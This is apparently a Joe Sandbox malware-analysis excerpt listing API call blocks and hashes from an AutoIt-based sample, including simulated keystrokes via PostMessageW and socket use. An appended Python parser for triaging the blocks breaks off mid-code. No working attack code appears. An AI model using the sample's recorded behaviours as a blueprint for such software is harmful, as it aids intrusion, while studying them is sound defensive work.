            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01035A65,?,?,000000FF,00000000,?,000000FF,?), ref: 01032DC2
            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01032DE1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
            • String ID:
            • API String ID: 3864802216-0
            • Opcode ID: 1ca9007890c2e89766dfe08cf75a790e8e736e85797156f030fd135aeacf2ade
            • Instruction ID: 16c1f828892e6a3d16d24a4d0c286a33dd149048902081b5103c78c6bbb1020b
            • Opcode Fuzzy Hash: 1ca9007890c2e89766dfe08cf75a790e8e736e85797156f030fd135aeacf2ade
            • Instruction Fuzzy Hash: 4E318B72201214BBFB218F54CC89FEB3FADEB49711F044056FE88EA291C67A9840C7A0
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: 5c4fe6568c8a3498fbc5d36b9ba401cf1c3b64f38dc02a935f038c6a8f4942f4
            • Instruction ID: 2bf69de11016c9653dd6b2beff4a973f0f012cb3cdcbebf4a16bb1811d47f37b
            • Opcode Fuzzy Hash: 5c4fe6568c8a3498fbc5d36b9ba401cf1c3b64f38dc02a935f038c6a8f4942f4
            • Instruction Fuzzy Hash: 03219861A4020A77F2165515AF83FFA339CBE56284F040018FD855B5C2F764ED208DA5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: NULL Pointer assignment$Not an Object type
            • API String ID: 0-572801152
            • Opcode ID: 54bbbb257c15ac24fef1c525eb619220404c8a7fdfa772b47dcb60995f9ff6c7
            • Instruction ID: 4325b7ef2aec2bfe3eb28a7c26c2d9e793cd0b415f45659be127382c47da0d15
            • Opcode Fuzzy Hash: 54bbbb257c15ac24fef1c525eb619220404c8a7fdfa772b47dcb60995f9ff6c7
            • Instruction Fuzzy Hash: 86D19171A0021A9FEF14CFA8CC80AEEB7F5BF48314F148069EA55EB281E775D945CB94
            APIs
            • GetCPInfo.KERNEL32(?,?), ref: 00FE15CE
            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FE1651
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FE16E4
            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FE16FB
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FE1777
            • __freea.LIBCMT ref: 00FE17A2
            • __freea.LIBCMT ref: 00FE17AE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
            • String ID:
            • API String ID: 2829977744-0
            • Opcode ID: 3e0481276ed4b44a7a5397d40716710523c81de7af1c154cf66c4629eb4bab13
            • Instruction ID: 2eeabbfa45536de872b546e628145db18ef26f1925faac5cca6637e7e4069d60
            • Opcode Fuzzy Hash: 3e0481276ed4b44a7a5397d40716710523c81de7af1c154cf66c4629eb4bab13
            • Instruction Fuzzy Hash: 9891B572E002969ADF208E77CC81EEE7BB5BF49720F184659E911E7140D739DD44EB60
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearInit
            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
            • API String ID: 2610073882-625585964
            • Opcode ID: 5bdc3bb366885a2483b865fee161e6900341ccb2cc645452d65ac09647408801
            • Instruction ID: 4dadbd84b67e8f61b08f961cc8ff529ac6871be5c4e1079ed129a862fa9b5cf9
            • Opcode Fuzzy Hash: 5bdc3bb366885a2483b865fee161e6900341ccb2cc645452d65ac09647408801
            • Instruction Fuzzy Hash: 4E917D71A00229EBDF24CFA5C888EAEBBB8FF45714F008559E595EB281D7709941CFA0
            APIs
            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0101125C
            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01011284
            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 010112A8
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010112D8
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0101135F
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010113C4
            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 01011430
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ArraySafe$Data$Access$UnaccessVartype
            • String ID:
            • API String ID: 2550207440-0
            • Opcode ID: 0fcab0b4df3ccaa3fcdbd8cb164420cf3c086b9c861921db8de3a0d13e51a02a
            • Instruction ID: 255cd81bd3278ec63235a88a36bfbaf46bd62d631c5d21bcac93b242ea8ba8dd
            • Opcode Fuzzy Hash: 0fcab0b4df3ccaa3fcdbd8cb164420cf3c086b9c861921db8de3a0d13e51a02a
            • Instruction Fuzzy Hash: 2091F671A002099FEB04DFA8D884BFE77B5FF45714F144029E681E7299DB7DA941CB90
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ObjectSelect$BeginCreatePath
            • String ID:
            • API String ID: 3225163088-0
            • Opcode ID: 878eb3532dacf28cf6e044e1d3fd6f1f1fe69536e2dddb2c1334755c9ed9049e
            • Instruction ID: 549df622e05bc802f82fced9b0dba1de930ba06f65746e44526afbfc851afcf5
            • Opcode Fuzzy Hash: 878eb3532dacf28cf6e044e1d3fd6f1f1fe69536e2dddb2c1334755c9ed9049e
            • Instruction Fuzzy Hash: D7913671D44219AFCB10CFA9CC84AEEBBB8FF49320F148459E615B7251D379A941DF60
            APIs
            • VariantInit.OLEAUT32(?), ref: 0102396B
            • CharUpperBuffW.USER32(?,?), ref: 01023A7A
            • _wcslen.LIBCMT ref: 01023A8A
            • VariantClear.OLEAUT32(?), ref: 01023C1F
              • Part of subcall function 01010CDF: VariantInit.OLEAUT32(00000000), ref: 01010D1F
              • Part of subcall function 01010CDF: VariantCopy.OLEAUT32(?,?), ref: 01010D28
              • Part of subcall function 01010CDF: VariantClear.OLEAUT32(?), ref: 01010D34
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
            • String ID: AUTOIT.ERROR$Incorrect Parameter format
            • API String ID: 4137639002-1221869570
            • Opcode ID: 48f4bdb8c613707580179eeda6d11b998a7790e33a3a234bc25141119e8b05e7
            • Instruction ID: 21b2a4fe177bf448d3014b4ae0c5bcfd4f037e4f2062fc269c736a91370c7d6c
            • Opcode Fuzzy Hash: 48f4bdb8c613707580179eeda6d11b998a7790e33a3a234bc25141119e8b05e7
            • Instruction Fuzzy Hash: 09915974A083159FC704EF28C88096AB7E5FF89714F04886EF9C99B351DB39E905CB92
            APIs
              • Part of subcall function 0100000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?,?,0100035E), ref: 0100002B
              • Part of subcall function 0100000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000046
              • Part of subcall function 0100000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000054
              • Part of subcall function 0100000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?), ref: 01000064
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 01024C51
            • _wcslen.LIBCMT ref: 01024D59
            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 01024DCF
            • CoTaskMemFree.OLE32(?), ref: 01024DDA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
            • String ID: NULL Pointer assignment
            • API String ID: 614568839-2785691316
            • Opcode ID: 831d2329a5fc7aab607626438702b3eee8dfb32d1543a38565a3b40e846301d4
            • Instruction ID: b0a8741971d36eadaae8b232d1e90a5e2932fe8250f901a8b4da6e273d513e74
            • Opcode Fuzzy Hash: 831d2329a5fc7aab607626438702b3eee8dfb32d1543a38565a3b40e846301d4
            • Instruction Fuzzy Hash: B29118B1D0022D9FEF15DFA4CC90AEEBBB8BF08314F10856AE955A7241DB745A44CF60
            APIs
            • GetMenu.USER32(?), ref: 01032183
            • GetMenuItemCount.USER32(00000000), ref: 010321B5
            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010321DD
            • _wcslen.LIBCMT ref: 01032213
            • GetMenuItemID.USER32(?,?), ref: 0103224D
            • GetSubMenu.USER32(?,?), ref: 0103225B
              • Part of subcall function 01003A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01003A57
              • Part of subcall function 01003A3D: GetCurrentThreadId.KERNEL32 ref: 01003A5E
              • Part of subcall function 01003A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010025B3), ref: 01003A65
            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010322E3
              • Part of subcall function 0100E97B: Sleep.KERNEL32 ref: 0100E9F3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
            • String ID:
            • API String ID: 4196846111-0
            • Opcode ID: 6a3845f4023c256c2e51911f8e88468b3f4e918a6ec42a79f498ca34258f9e08
            • Instruction ID: 679b502cb266f0ad30024377eca5e3425a637eadac310a2960acb0fbffc5c4aa
            • Opcode Fuzzy Hash: 6a3845f4023c256c2e51911f8e88468b3f4e918a6ec42a79f498ca34258f9e08
            • Instruction Fuzzy Hash: E3719075E00205AFCB11DF68CD45AAEBBF9EF89310F148499E996EB341DB34E9418B90
            APIs
            • GetParent.USER32(?), ref: 0100AEF9
            • GetKeyboardState.USER32(?), ref: 0100AF0E
            • SetKeyboardState.USER32(?), ref: 0100AF6F
            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0100AF9D
            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0100AFBC
            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0100AFFD
            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0100B020
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 9aa9cf2427d7d28400edc3454da1162e52f099b9890d087c6dc594e209207c06
            • Instruction ID: 54eab53bccea9bc9c51c4ebc56e1c77983303ee5f4e9bb9bd2c00415f2ffb240
            • Opcode Fuzzy Hash: 9aa9cf2427d7d28400edc3454da1162e52f099b9890d087c6dc594e209207c06
            • Instruction Fuzzy Hash: 6651B1A0A047D67DFB7782788845BBABEE95B06304F0885CDF2D9968C3C699A8C4D750
            APIs
            • GetParent.USER32(00000000), ref: 0100AD19
            • GetKeyboardState.USER32(?), ref: 0100AD2E
            • SetKeyboardState.USER32(?), ref: 0100AD8F
            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0100ADBB
            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0100ADD8
            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0100AE17
            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0100AE38
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 1074c6360ab1ea96f12e6b68251886f703f27d3f812910e9e024c9f93010609b
            • Instruction ID: 194abb0b061740a96f50fdbe81973ab72c72e2d6a9a965c5d07c94b927484dd8
            • Opcode Fuzzy Hash: 1074c6360ab1ea96f12e6b68251886f703f27d3f812910e9e024c9f93010609b
            • Instruction Fuzzy Hash: 3F51D4A1A087D57EFB3793388C55BBA7EE95B46300F0884CAE2D6574C2D294EC88D761
            APIs
            • GetConsoleCP.KERNEL32(00FE3CD6,?,?,?,?,?,?,?,?,00FD5BA3,?,?,00FE3CD6,?,?), ref: 00FD5470
            • __fassign.LIBCMT ref: 00FD54EB
            • __fassign.LIBCMT ref: 00FD5506
            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00FE3CD6,00000005,00000000,00000000), ref: 00FD552C
            • WriteFile.KERNEL32(?,00FE3CD6,00000000,00FD5BA3,00000000,?,?,?,?,?,?,?,?,?,00FD5BA3,?), ref: 00FD554B
            • WriteFile.KERNEL32(?,?,00000001,00FD5BA3,00000000,?,?,?,?,?,?,?,?,?,00FD5BA3,?), ref: 00FD5584
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
            • String ID:
            • API String ID: 1324828854-0
            • Opcode ID: 166a4fff5226daf40e8ff3e2a3bf38870fa4626d8d55ad9ab8742db0f65be64a
            • Instruction ID: cdff2802d6f0d6ee505c4783a07a4b863837b5392d09f79c65cac4317e2a1cf8
            • Opcode Fuzzy Hash: 166a4fff5226daf40e8ff3e2a3bf38870fa4626d8d55ad9ab8742db0f65be64a
            • Instruction Fuzzy Hash: 6A51B0B19006499FDB11CFA8D841BEEBBFAAF09710F18411BF555E3381D6309A41DB60
            APIs
            • _ValidateLocalCookies.LIBCMT ref: 00FC2D4B
            • ___except_validate_context_record.LIBVCRUNTIME ref: 00FC2D53
            • _ValidateLocalCookies.LIBCMT ref: 00FC2DE1
            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FC2E0C
            • _ValidateLocalCookies.LIBCMT ref: 00FC2E61
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
            • String ID: csm
            • API String ID: 1170836740-1018135373
            • Opcode ID: 1f0bcf3188d6239844470ec3a649e77e72af27fb9aff685bbce7989fdce9d243
            • Instruction ID: c7bee0ff1267fc359e4d3f6f17375f8275f9f705b2d7257f37227093f5eea95d
            • Opcode Fuzzy Hash: 1f0bcf3188d6239844470ec3a649e77e72af27fb9aff685bbce7989fdce9d243
            • Instruction Fuzzy Hash: 9D41B135E0020AABCF10DF68CE86F9EBBA5FF44324F148159E8156B392DB359A05DB90
            APIs
              • Part of subcall function 0102304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0102307A
              • Part of subcall function 0102304E: _wcslen.LIBCMT ref: 0102309B
            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01021112
            • WSAGetLastError.WSOCK32 ref: 01021121
            • WSAGetLastError.WSOCK32 ref: 010211C9
            • closesocket.WSOCK32(00000000), ref: 010211F9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
            • String ID:
            • API String ID: 2675159561-0
            • Opcode ID: e7f1baaa17d6f3f4bfb053353681e4e1629d211064a8bcc471c3429e623fa94a
            • Instruction ID: 09b3b28d3a49fb08a44c5d2553c0c42c8c061e8c82f797cff2423dcb924cbaff
            • Opcode Fuzzy Hash: e7f1baaa17d6f3f4bfb053353681e4e1629d211064a8bcc471c3429e623fa94a
            • Instruction Fuzzy Hash: 3C411831600214AFEB209F28C884BA9BBE9FF45324F148099FD95EB285C775ED41CBE1
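The function blocks above (for instance the GetKeyboardState / SetKeyboardState / PostMessageW block and the socket / WSAGetLastError / closesocket block) are easier to triage in bulk than by eye. The following is an added example, not part of the Joe Sandbox report or its IDA plugin: a small parser for this report's function-block format that turns each block into a record (direct calls, calls made inside a callee, the "Similarity" identifiers) and decodes the PostMessageW arguments using the standard Win32 WM_KEYDOWN / WM_KEYUP and VK_* values. The excerpt it runs on is constructed from two blocks on this page, trimmed to the lines the parser needs; the triage labels in TRIAGE_RULES are my own hypothetical grouping, not anything the report states.

```python
"""Added example: parse Joe Sandbox IDA-plugin function blocks into records."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt in the report's own format (two blocks from this page, trimmed).
SAMPLE = """\
APIs
• GetParent.USER32(00000000), ref: 0100AD19
• GetKeyboardState.USER32(?), ref: 0100AD2E
• SetKeyboardState.USER32(?), ref: 0100AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0100ADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0100ADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0100AE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0100AE38
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• Instruction Fuzzy Hash: 3F51D4A1A087D57EFB3793388C55BBA7EE95B46300F0884CAE2D6574C2D294EC88D761
APIs
  • Part of subcall function 0102304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0102307A
  • Part of subcall function 0102304E: _wcslen.LIBCMT ref: 0102309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01021112
• WSAGetLastError.WSOCK32 ref: 01021121
• WSAGetLastError.WSOCK32 ref: 010211C9
• closesocket.WSOCK32(00000000), ref: 010211F9
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• Instruction Fuzzy Hash: 3C411831600214AFEB209F28C884BA9BBE9FF45324F148099FD95EB285C775ED41CBE1
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-F]{8}))?$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")
# Standard Win32 values for the message and wParam arguments seen above.
WM = {"00000100": "WM_KEYDOWN", "00000101": "WM_KEYUP"}
VK = {"00000010": "VK_SHIFT", "00000011": "VK_CONTROL", "00000012": "VK_MENU", "0000005B": "VK_LWIN"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: Optional[str]
    subcall_of: Optional[str]  # callee address on "Part of subcall function" lines

@dataclass
class FuncBlock:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # key/value lines of the Similarity section

    def direct_api_names(self):
        return {c.name for c in self.apis if c.subcall_of is None}

    def strings(self):
        return [s for s in self.meta.get("String ID", "").split("$") if s]  # '$'-joined

def parse_blocks(text):
    """One FuncBlock per function; a block closes at its Instruction Fuzzy Hash line."""
    blocks, cur, section = [], FuncBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            continue
        if not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs" and (m := API_RE.match(body)):
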